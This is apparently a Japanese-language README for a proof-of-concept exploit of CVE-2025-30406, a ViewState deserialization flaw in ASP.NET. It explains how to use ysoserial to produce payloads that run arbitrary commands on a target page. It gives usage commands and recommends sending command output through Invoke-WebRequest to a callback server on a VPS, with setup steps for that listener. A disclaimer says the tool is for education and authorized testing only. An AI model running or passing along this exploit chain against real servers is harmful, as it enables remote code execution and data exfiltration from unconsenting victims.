
CVE-2025-30406 ViewState Exploit PoC
これはASP.NETアプリケーションにおけるCVE-2025-30406のViewStateデシリアライゼーション脆弱性を実証するProof-of-Concept (PoC)スクリプトです。ysoserialを使用して悪意のあるViewStateペイロードを生成し、指定されたURLに送信してコマンドを実行します。最良の結果を得るには、コマンド出力をVPS上で動作するカスタムHTTPサーバー(server.py)に外部送信し、タイムスタンプ、緑色のプロンプト、白色の出力テキストで整形された形式で表示します。このスクリプトは教育目的のみを意図しており、明示的な許可を得たシステムでのみ使用してください。無断使用は違法かつ非倫理的です。
exploit.py: ViewStateペイロードを生成・送信するメインのPoCスクリプト。server.py: 外部送信されたコマンド出力を整形形式で受信・表示するHTTPサーバー。README.md: このファイル。セットアップと使用方法の説明。requestsライブラリ (pip install requests)server.pyを実行するサーバー(外部送信推奨)git clone https://github.com/yourusername/cve-2025-30406-poc.git
cd cve-2025-30406-poc
pip install requests
exploit.pyと同じディレクトリに配置するか、そのパスを指定:
外部送信されたコマンド出力を整形形式で受け取るには、VPS上でserver.pyを実行します:
server.pyをVPSにコピー(例: scpを使用):
scp server.py user@your-vps-ip:/home/user/
sudo apt update && sudo apt install python3 python3-pip
python3 server.py
sudo ufw allow 8000
http://your-vps-ip:8000)をメモし、exploit.pyの-eフラグで使用します。exploit.pyを必須引数とともに実行します。-eフラグはオプションですが、コマンド出力をserver.pyに外部送信して整形表示するために強く推奨されます。
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
-u, --url: ターゲットURL (例: http://target.com/page.aspx) [必須]-c, --command: 実行するコマンド (例: whoami) [必須]-y, --ysoserial: ysoserial実行可能ファイルへのパス (デフォルト: ./ysoserial.exe) [オプション]-e, --exfil: コマンド出力の外部送信先コールバックURL (例: http://your-vps:8000) [オプション]python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
server.pyを実行するVPSへの外部送信ありでの実行(推奨):
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
VPSまたはローカルマシンで、外部送信された出力を受信するHTTPサーバーを起動:
python3 server.py
サーバーはコマンド出力をタイムスタンプ、緑色の$プロンプト、白色のテキストで表示し、可読性を高めます。
exploit.py):
-eが指定された場合、コマンドは出力をキャプチャし、Invoke-WebRequestでコールバックURLに送信するようにラップされる。__VIEWSTATEパラメータに埋め込まれる。server.py):
$プロンプト、白色の出力テキストとともに表示。-eコールバックURL用の公開アクセス可能なサーバーが必要です。このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
質問やフィードバックがある場合は、このリポジトリでIssueを開いてください。